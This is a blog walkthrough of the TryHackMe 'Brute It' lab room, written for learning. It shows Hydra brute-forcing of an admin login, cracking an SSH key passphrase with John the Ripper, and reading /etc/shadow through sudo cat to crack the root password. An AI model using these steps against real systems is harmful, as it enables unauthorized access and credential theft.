TryHackMe: Brute It Walkthrough

Task [1]: About this box

Task [2]: Reconnaissance

To gather information about ports perform nmap scan. I used the command: nmap -sSV -Pn MACHINE_IP

To perform directory search the tool called gobuster is used. I used he command: gobuster dir -u http://MACHINE_IP --wordlist /usr/share/wordlists/dirb/common.txt

Task [3]: Getting a shell

Start with admin page. It is a simple login page.

Looking at the page source we got a comment line which is for user John that the username is admin.

We can use the famous password crack tool ‘Hydra’ to get the password with username admin. Command used: hydra -l admin -P rockyou.txt MACHINE_IP http-post-form “/admin/index.php:user=^USER^&pass=^PASS^:F=Username or password invalid” -V

After few attempts we got the password which is the answer to question 1.

After successfully logging in we got a RSA key and answer to the question 4.

The following screenshot shows the RSA key:

Using command: wget http://MACHINE_IP/admin/panel/id_rsa we can get the RSA key in our local system.

ssh2john.py is used to convert the RSA key into text format. The command used is: /usr/share/john/ssh2john.py > idrsa.txt

Using the tool john the ripper we can perform brute force to crack the RSA key using the wordlist rockyou.txt

Command used: john idrsa.txt --wordlist=rockyou.txt this will give the RSA private key passphrase.

While information gathering we got to know that port 22 is open and ssh service is running. Using the RSA key and the passphrase we can try connecting to the ssh server.

Command used: ssh john@MACHINE_IP -i id_rsa

We got a shell on SSH as user name John. Take the user flag.

Task [4]: Privilege Escalation

Using sudo -l we can check user privileges. We found that user john can run command /bin/cat as root.

Checking on GTFObins that if we can exploit /bin/cat or not. Yes /bin/cat can be exploited.

Following the steps given in GTFObins we can get access to the /etc/shadow which contains the system users and passwords.

Make a file named ‘hashes’ and copy the content of shadow file in hashes and using john to crack the hashes using rockyou.txt, we got the password of root.

Command used: john hashes --wordlist=rockyou.txt

Using su command to change the user to root. And yesssss….. We are root user now. Get the root flag.

Successfully completed the room :-)

Thank you!!!

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Sakshi Aggarwal

Sakshi Aggarwal

Digital forensics enthusiast | Cyber security | Bug hunter | Java | Python | Analyzer